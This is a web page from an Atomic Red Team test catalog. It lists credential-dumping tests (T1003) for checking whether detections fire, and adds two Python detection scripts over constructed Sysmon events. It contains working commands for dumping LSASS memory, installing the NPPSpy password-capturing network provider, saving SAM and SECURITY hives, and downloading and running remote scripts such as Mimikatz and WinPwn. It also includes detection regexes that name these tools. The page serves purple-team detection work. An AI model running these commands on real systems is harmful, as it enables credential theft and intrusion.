Atomic Red Team

Atomic test builder

Run one real attacker behaviour on purpose, and find out whether your detections actually fire.

Atomic Red Team is an open library of small, precise tests mapped to ATT&CK techniques, maintained by Red Canary. Each test performs a single real attacker action (dump LSASS, create a scheduled task, disable the firewall) in the smallest possible way, and a technique usually has several tests, one per tool or variant. You run them deliberately, in a lab, to answer one question: when an attacker does this, does my detection catch it?

Why anyone runs these

Owning a SIEM and writing rules is not the same as those rules working. The only way to know is to perform the attack and watch. That tight red-action / blue-check loop is “purple teaming.” A test that runs silently is a hole in your visibility you did not know you had.

What this page adds

The raw tests only give you a command. For the technique each one exercises, we also show whether a detection rule even exists in the open corpus (Sigma / IDS / YARA), and - signed in, with your stack’s coverage declared - whether you detect it. So you run the tests that matter and you know what the result should be.

How to use it
Pick what to test. Start from a tactic (“test my credential-access coverage”), a platform, or type a technique ID or tool name. Narrow to the slice you actually care about instead of scrolling a flat list.
Read the test. Each card shows the ATT&CK technique it maps to (click it for full detail and detections), whether it needs admin, and which platforms it runs on. The description is the attacker behaviour it reproduces.
Check coverage before you run. A green detection-rule badge means the open corpus has a rule for this technique - your SIEM should too. A red no rule badge means nothing maps to it. With a stack selected, a second badge shows whether you declared coverage.
Copy the command and run it - in an isolated lab you own, never production. It is a real action. The “needs admin” flag tells you whether to run it elevated so the test is realistic.
Confirm your SIEM alerted. If it did, your detection works. If it stayed silent, you just found a gap - and this exact test reproduces it on demand while you tune the rule.
Close blind spots first. The bar above counts techniques with no rule; show only blind spots filters to them. Those are the cheapest, highest-value gaps to fix.
Active filter: technique T1003
9 techniques exercised by these tests · 2 with no detection rule in our catalog

The badges on each test
Each test reproduces one attacker behaviour. The key pair of badges: a detection rule in our catalog (is catching this even possible) versus your coverage (do you actually catch it).

Matching tests: 54
Gsecdump · T1003 OS Credential Dumping · Credential Access · command_prompt · needs admin · windows · 149 detection rules
Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username entries followed by two 32-character hashes. If you see output that says "compat: error: failed to create child process", execution was likely blocked by anti-virus. You will receive only error output if you do not run this test from an elevated context (run as administrator). If you see "The system cannot find the path specified", use the get-prereq_commands to download and install Gsecdump first.
"#{gsecdump_exe}" -a
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
Credential Dumping with NPPSpy · T1003 OS Credential Dumping · Credential Access · powershell · needs admin · windows · 149 detection rules
Appends NPPSpy to the ProviderOrder registry value and creates the Services\NPPSpy\NetworkProvider keys that register NPPSpy.dll as a network provider. At the next logon the provider receives the user's cleartext password and writes it to C:\NPPSpy.txt. Clean-up deletes the files and reverses the registry changes. NPPSpy source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
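What the NPPSpy test looks like from the blue side, as an added example (this is not Atomic Red Team code and not part of this catalog): the registry writes in the steps above are the earliest durable signal, since the password capture itself only happens at the next logon inside the provider chain. The script below runs a baseline diff over constructed events in the shape of Sysmon Event ID 13 (RegistryEvent, value set). The baseline provider list RDPNP,LanmanWorkstation,webclient and the DLL allowlist are assumptions for a stock Windows 10 client; VPN clients, Citrix or VMware tools legitimately add providers, so take the baseline from your own fleet.

```python
"""Baseline-diff detection for rogue network providers (the NPPSpy test above).

Added example, not Atomic Red Team code. Events are constructed in the shape of
Sysmon Event ID 13 (RegistryEvent: value set). The baseline provider list and the
DLL allowlist are assumptions for a stock Windows 10 client.
"""
import re

ORDER_VALUE = r"hklm\system\currentcontrolset\control\networkprovider\order\providerorder"
PROVIDER_PATH_RE = re.compile(
    r"^hklm\\system\\currentcontrolset\\services\\([^\\]+)\\networkprovider\\providerpath$",
    re.IGNORECASE,
)

# Assumed baseline (stock Windows 10 client): RDP, SMB and WebDAV providers.
BASELINE_PROVIDERS = {"rdpnp", "lanmanworkstation", "webclient"}
# DLLs that back those providers (assumed allowlist).
BASELINE_DLLS = {"drprov.dll", "ntlanman.dll", "davclnt.dll"}


def _norm(path):
    return path.replace("/", "\\").strip()


def check_provider_order(details):
    """Return the providers in a ProviderOrder value that are not in the baseline."""
    names = [p.strip().lower() for p in details.split(",") if p.strip()]
    return [n for n in names if n not in BASELINE_PROVIDERS]


def detect(events):
    """Return one alert dict per suspicious value-set event, in event order."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
            continue
        target = _norm(ev.get("TargetObject", ""))
        details = ev.get("Details", "")
        image = ev.get("Image", "")
        if target.lower() == ORDER_VALUE:
            new = check_provider_order(details)
            if new:
                alerts.append({"rule": "new-network-provider", "providers": new, "image": image})
            continue
        m = PROVIDER_PATH_RE.match(target)
        if m:
            dll = _norm(details).rsplit("\\", 1)[-1].lower()
            if dll not in BASELINE_DLLS:
                alerts.append({"rule": "unknown-provider-dll", "service": m.group(1),
                               "dll": dll, "image": image})
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, Sysmon EID 13 shape
    # Stock value rewritten by the OS: nothing new in it.
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrder",
     "Details": "RDPNP,LanmanWorkstation,webclient"},
    # The atomic appends NPPSpy to ProviderOrder ...
    {"EventID": 13, "EventType": "SetValue", "Image": PS,
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrder",
     "Details": "RDPNP,LanmanWorkstation,webclient,NPPSpy"},
    # ... and registers its DLL as the provider module.
    {"EventID": 13, "EventType": "SetValue", "Image": PS,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\NPPSpy\NetworkProvider\ProviderPath",
     "Details": r"%SystemRoot%\System32\NPPSPY.dll"},
    # A legitimate provider path rewritten by servicing stays quiet.
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider\ProviderPath",
     "Details": r"%SystemRoot%\System32\ntlanman.dll"},
    # Unrelated key.
    {"EventID": 13, "EventType": "SetValue", "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\Software\Contoso\Agent\Version", "Details": "3.1"},
]


def run_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Keep both rules: a rogue provider needs both the ProviderOrder entry and a Services\<name>\NetworkProvider key, so either write is a signal, and the ProviderPath rule also catches a DLL swapped into an existing legitimate provider's entry. Pair it with a file-creation rule on C:\NPPSpy.txt if your telemetry has one.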
Dump svchost.exe to gather RDP credentials · T1003 OS Credential Dumping · Credential Access · powershell · needs admin · windows · 149 detection rules
The svchost.exe instance that services RDP holds the plain-text credentials of users who logged on over RDP. The test picks the process owning the established connection on port 3389 (falling back to the first svchost.exe if there is none) and dumps it. Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ Upon successful execution, you should see the file $env:TEMP\svchost-exe.dmp created.
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) · T1003 OS Credential Dumping · Credential Access · powershell · needs admin · windows · 149 detection rules
AppCmd.exe is a command-line utility for managing an IIS web server. Its list command reveals the service account credentials configured for the application pools. An adversary may use these credentials for other malicious purposes. [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) · T1003 OS Credential Dumping · Credential Access · powershell · needs admin · windows · 149 detection rules
AppCmd.exe is a command-line utility for managing an IIS web server. Its /config switch reveals the service account credentials configured for the application pools. An adversary may use these credentials for other malicious purposes. [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Dump Credential Manager using keymgr.dll and rundll32.exe · T1003 OS Credential Dumping · Credential Access · powershell · windows · 149 detection rules
This test executes the exported function KRShowKeyMgr in keymgr.dll via rundll32.exe. It opens a window that lets you export the credentials stored in Credential Manager to a file (.crd by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials and recover the passwords. The only limitation is that the export requires a CTRL+ALT+DELETE input from the attacker, which can be achieved in multiple ways (e.g. a custom implant with remote-control capabilities, enabling RDP, etc.). Reference: https://twitter.com/0gtweet/status/1415671356239216653
rundll32.exe keymgr,KRShowKeyMgr
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Send NTLM Hash with RPC Test Connection · T1003 OS Credential Dumping · Credential Access · powershell · windows · 149 detection rules
The rpcping command sends an RPC test connection to a target server (-s) on a chosen endpoint (-e); with -u NTLM it authenticates with NTLM, so the client's NTLM response is sent to that server, where an attacker-controlled listener can capture it. Ref: https://twitter.com/vysecurity/status/974806438316072960
rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Dump LSASS.exe Memory using ProcDump · T1003.001 LSASS Memory · Credential Access · command_prompt · needs admin · windows · 79 detection rules
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the file c:\windows\temp\lsass_dump.dmp created. If you see a message saying "procdump.exe is not recognized as an internal or external command", use the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
Dump LSASS.exe Memory using comsvcs.dll · T1003.001 LSASS Memory · Credential Access · powershell · needs admin · windows · 79 detection rules
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the MiniDump export of the built-in comsvcs.dll, called through rundll32.exe. Upon successful execution, you should see the file $env:TEMP\lsass-comsvcs.dmp created.
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Dump LSASS.exe Memory using direct system calls and API unhooking · T1003.001 LSASS Memory · Credential Access · command_prompt · needs admin · windows · 79 detection rules
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid user-mode hooks placed by AV/EDR. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the file C:\windows\temp\dumpert.dmp created. If you see a message saying "The system cannot find the path specified.", use the get-prereq_commands to download the tool first.
"#{dumpert_exe}"
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
Dump LSASS.exe Memory using NanoDump · T1003.001 LSASS Memory · Credential Access · command_prompt · needs admin · windows · 79 detection rules
The NanoDump tool uses direct syscalls and writes the dump with an invalid signature (so file scanners looking for the MDMP header miss it; the signature is restored offline) to avoid detection. https://github.com/helpsystems/nanodump Upon successful execution, you should find nanodump.dmp in the temp directory.
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
Dump LSASS.exe Memory using Windows Task Manager · T1003.001 LSASS Memory · Credential Access · manual · windows · 79 detection rules
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions (right-click lsass.exe and choose Create dump file). There is no command to copy for this test, and no command line is involved, which is exactly why it belongs in a detection exercise.
Offline Credential Theft With Mimikatz · T1003.001 LSASS Memory · Credential Access · command_prompt · needs admin · windows · 79 detection rules
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
LSASS read with pypykatz · T1003.001 LSASS Memory · Credential Access · command_prompt · needs admin · windows · 79 detection rules
Parses secrets held in the LSASS process with Python, similar to Mimikatz's sekurlsa:: module. Python 3 must be installed; use the get_prereq_commands to meet the prerequisites for this test. Successful execution displays multiple usernames and passwords/hashes on screen. The test creates a Python virtual environment within the External Payloads folder that can be deleted manually after execution.
"#{venv_path}\Scripts\pypykatz" live lsa 
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
Dump LSASS.exe Memory using Out-Minidump.ps1 · T1003.001 LSASS Memory · Credential Access · powershell · needs admin · windows · 79 detection rules
The memory of lsass.exe is often dumped for offline credential theft attacks. This test uses a pure PowerShell implementation that calls the MiniDumpWriteDump Win32 API from within the powershell.exe process. Upon successful execution, you should see a file matching $env:TEMP\lsass_*.dmp created. Author of Out-Minidump: Matthew Graeber (@mattifestation)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Create Mini Dump of LSASS.exe using ProcDump · T1003.001 LSASS Memory · Credential Access · command_prompt · needs admin · windows · 79 detection rules
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This variant uses -mm to produce a mini dump of lsass.exe. Upon successful execution, you should see the file c:\windows\temp\lsass_dump.dmp created. If you see a message saying "procdump.exe is not recognized as an internal or external command", use the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
Powershell Mimikatz · T1003.001 LSASS Memory · Credential Access · powershell · needs admin · windows · 79 detection rules
Dumps credentials from memory via PowerShell by invoking a remote Mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes on screen. Common failures include an "access denied" error, which results when anti-virus blocks execution, and, if you run the test without the required administrative privileges, the error "ERROR kuhl_m_sekurlsa_acquireLSA" near the bottom of the output.
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Dump LSASS with createdump.exe from .Net v5 · T1003.001 LSASS Memory · Credential Access · powershell · needs admin · windows · 79 detection rules
Use the createdump executable shipped with the .NET 5 runtime (a Microsoft-signed binary) to create an LSASS dump. [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Dump LSASS.exe using imported Microsoft DLLs · T1003.001 LSASS Memory · Credential Access · powershell · needs admin · windows · 79 detection rules
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling their exported functions. Xordump re-reads the resulting minidump, XORs it and deletes the original immediately, to defeat brittle EDR detections that signature lsass minidump files on disk. Upon successful execution, you should see the file $env:TEMP\lsass-xordump.t1003.001.dmp created.
#{xordump_exe} -out #{output_file} -x 0x41
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Dump LSASS.exe using lolbin rdrleakdiag.exe · T1003.001 LSASS Memory · Credential Access · powershell · needs admin · windows · 79 detection rules
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the built-in (lolbin) rdrleakdiag.exe. Upon successful execution, you should see the files $env:TEMP\t1003.001-13-rdrleakdiag\minidump_<PID>.dmp and results_<PID>.hlk created.
# Locate rdrleakdiag.exe (System32 first, then SysWOW64)
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
    $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
    $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
    $binary_path = "File not found"
    exit 1
}
$lsass_pid = Get-Process lsass | Select-Object -ExpandProperty Id
if (-not (Test-Path -Path "$env:TEMP\t1003.001-13-rdrleakdiag")) { New-Item -ItemType Directory -Path "$env:TEMP\t1003.001-13-rdrleakdiag" -Force }
Write-Host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Dump LSASS.exe Memory through Silent Process Exit · T1003.001 LSASS Memory · Credential Access · command_prompt · needs admin · windows · 79 detection rules
WerFault.exe (the Windows Error Reporting process that handles process crashes) can be abused to create a memory dump of lsass.exe in a directory of your choice. The method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which can trigger specific actions for a monitored process in one of two scenarios: the process terminates itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API. The major advantage of this technique is that it does not cause lsass.exe to crash, and since WerFault.exe writes dump files all the time (not just for lsass.exe), the illicit credential extraction blends into activity that looks normal from a defender's viewpoint: the process that opens lsass.exe and writes the dump is WerFault.exe, not the attacker's tool. Upon successful execution, you should find the dump file in the directory of your choice, or "%temp%\SilentProcessExit" by default.
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
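Which of the LSASS tests above your telemetry would actually see, as an added example (my code, not Atomic Red Team's and not part of this catalog): the script below runs two detections over constructed events in the shape of Sysmon Event ID 1 (ProcessCreate) and Event ID 10 (ProcessAccess). One is keyed on command-line strings for the tools on this page; the other fires on any process opening lsass.exe with PROCESS_VM_READ or PROCESS_DUP_HANDLE. The GrantedAccess values, paths and the test grouping field are constructed, and the allowlist of legitimate lsass readers is an assumption to tune for your own AV/EDR. Event ID 10 is only produced if your Sysmon config has a ProcessAccess rule that includes lsass.exe as TargetImage; it is not collected by default.

```python
"""Which LSASS-dump tests leave which signal, given Sysmon-style telemetry.

Added example, not Atomic Red Team code. Events are constructed in the shape of
Sysmon Event ID 1 (ProcessCreate) and Event ID 10 (ProcessAccess); GrantedAccess
values are plausible, not captured. The "test" field is harness metadata.
"""
import re

PROCESS_VM_READ = 0x0010     # required to copy memory out of lsass
PROCESS_DUP_HANDLE = 0x0040  # used by handle-duplication dump variants

# Assumed allowlist of legitimate lsass readers on a stock host; tune for your AV/EDR.
# WerFault.exe is deliberately absent: the Silent Process Exit test dumps through it.
ALLOWED_SOURCES = {"msmpeng.exe", "csrss.exe", "wininit.exe"}

# Command-line indicators for the tools on this page. Brittle by design: a renamed
# binary does not match, which is what the comparison with EID 10 is meant to show.
CMDLINE_RULES = [
    ("procdump-lsass", re.compile(r"procdump\S*\s.*-m[am]\s+lsass", re.I)),
    ("comsvcs-minidump", re.compile(r"comsvcs\.dll\s*,\s*minidump", re.I)),
    ("createdump", re.compile(r"createdump\S*\s.*-f\s", re.I)),
    ("rdrleakdiag", re.compile(r"rdrleakdiag\S*\s.*/fullmemdmp", re.I)),
    ("nanodump-name", re.compile(r"nanodump\S*\s", re.I)),
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_access(ev):
    """EID 10: any non-allowlisted process opening lsass with read or dup-handle rights."""
    if basename(ev.get("TargetImage", "")) != "lsass.exe":
        return None
    src = basename(ev.get("SourceImage", ""))
    if src in ALLOWED_SOURCES:
        return None
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    if granted & (PROCESS_VM_READ | PROCESS_DUP_HANDLE):
        return f"lsass-access:{src}:{granted:#x}"
    return None


def check_command_line(ev):
    """EID 1: string indicators for the dump tools on this page."""
    cmd = ev.get("CommandLine", "")
    for name, rx in CMDLINE_RULES:
        if rx.search(cmd):
            return f"cmdline:{name}"
    return None


def detect(events):
    """Map each test to the sorted list of signals it produced; an empty list is a gap."""
    hits = {}
    for ev in events:
        signals = hits.setdefault(ev["test"], set())
        if ev.get("EventID") == 10:
            sig = check_process_access(ev)
        elif ev.get("EventID") == 1:
            sig = check_command_line(ev)
        else:
            sig = None
        if sig:
            signals.add(sig)
    return {t: sorted(s) for t, s in hits.items()}


LSASS = r"C:\Windows\System32\lsass.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed
    {"test": "procdump", "EventID": 1,
     "CommandLine": r'"C:\Tools\procdump.exe" -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp'},
    {"test": "procdump", "EventID": 10, "SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"test": "comsvcs", "EventID": 1,
     "CommandLine": r"C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 712 C:\Users\lab\AppData\Local\Temp\lsass-comsvcs.dmp full"},
    {"test": "comsvcs", "EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    # Task Manager "Create dump file": there is no command line to match at all.
    {"test": "taskmgr", "EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    # NanoDump renamed by the operator; direct syscalls still pass the kernel callback.
    {"test": "nanodump-renamed", "EventID": 1,
     "CommandLine": r"C:\Users\Public\svchelper.exe -w C:\Users\Public\out.dmp"},
    {"test": "nanodump-renamed", "EventID": 10, "SourceImage": r"C:\Users\Public\svchelper.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x410"},
    # Out-Minidump: MiniDumpWriteDump is called from inside powershell.exe.
    {"test": "out-minidump", "EventID": 1, "CommandLine": f'"{PS}"'},
    {"test": "out-minidump", "EventID": 10, "SourceImage": PS,
     "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    # Silent Process Exit: WerFault.exe is the process that writes the dump.
    {"test": "silent-process-exit", "EventID": 10, "SourceImage": r"C:\Windows\System32\WerFault.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    # Noise: Defender reading lsass, and a process asking only for limited query rights.
    {"test": "noise-control", "EventID": 10,
     "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"test": "noise-control", "EventID": 10, "SourceImage": r"C:\Windows\explorer.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1000"},
]


def run_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for test, signals in run_sample().items():
        print(f"{test:20} {', '.join(signals) if signals else 'GAP'}")
```

The result table is the point. Task Manager, Out-Minidump inside powershell.exe and a renamed NanoDump leave nothing useful on the command line, yet all three still appear as a process access, because direct syscalls and API unhooking only defeat user-mode hooks, not the kernel object callback Event ID 10 is built on. The Silent Process Exit variant shows up with WerFault.exe as SourceImage, so resist allowlisting WerFault.exe to quiet the rule. Do not alert on 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) alone; many benign processes open lsass that way.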
Registry dump of SAM, creds, and secrets · T1003.002 Security Account Manager · Credential Access · command_prompt · needs admin · windows · 28 detection rules
Local SAM hashes (SAM & SYSTEM hives), cached domain credentials (SYSTEM & SECURITY) and LSA secrets (SYSTEM & SECURITY) can be saved via three registry keys and then processed offline with https://github.com/Neohapsis/creddump7 Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
Registry parse with pypykatz · T1003.002 Security Account Manager · Credential Access · command_prompt · needs admin · windows · 28 detection rules
Parses the live registry hives (SAM, SECURITY, SYSTEM) with pypykatz to obtain stored credentials. The test creates a Python virtual environment within the External Payloads folder that can be deleted manually after execution.
"#{venv_path}\Scripts\pypykatz" live registry
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
esentutl.exe SAM copy · T1003.002 Security Account Manager · Credential Access · command_prompt · needs admin · windows · 28 detection rules
Copy the SAM hive using the esentutl.exe utility, which reads the locked file through a volume shadow copy (/vss). The same command can copy other locked files and hives such as SYSTEM and NTUSER.dat.
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
PowerDump Hashes and Usernames from Registry · T1003.002 Security Account Manager · Credential Access · powershell · needs admin · windows · 28 detection rules
Executes a hashdump by reading the hashes from the registry.
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
dump volume shadow copy hives with certutil · T1003.002 Security Account Manager · Credential Access · command_prompt · windows · 28 detection rules
Dump hives from volume shadow copies with the certutil utility, exploiting the vulnerability known as "HiveNightmare" or "SeriousSAM": on affected builds the hive files under System32\config are readable by non-administrators, so their copies in volume shadow copies can be read without admin rights. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
dump volume shadow copy hives with System.IO.File · T1003.002 Security Account Manager · Credential Access · powershell · windows · 28 detection rules
Dump hives from volume shadow copies with System.IO.File. Like the certutil variant, this relies on the shadow-copy hive files being readable by non-administrators. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
1..#{limit} | % {
  try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}", "$env:TEMP\#{target_hive}vss$_", $true) } catch {}
  ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes · T1003.002 Security Account Manager · Credential Access · powershell · windows · 28 detection rules
Loots local credentials by dumping the SAM file for NTLM hashes, via the samfile function of WinPwn. The script is loaded straight from GitHub into memory, so the powershell.exe command line alone shows nothing about what ran.
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive  
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
Dumping of SAM, creds, and secrets (Reg Export) · T1003.002 Security Account Manager · Credential Access · command_prompt · needs admin · windows · 28 detection rules
Local SAM hashes (SAM & SYSTEM hives), cached domain credentials (SYSTEM & SECURITY) and LSA secrets (SYSTEM & SECURITY) can be exported via three registry keys. This variant uses reg export instead of reg save. Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
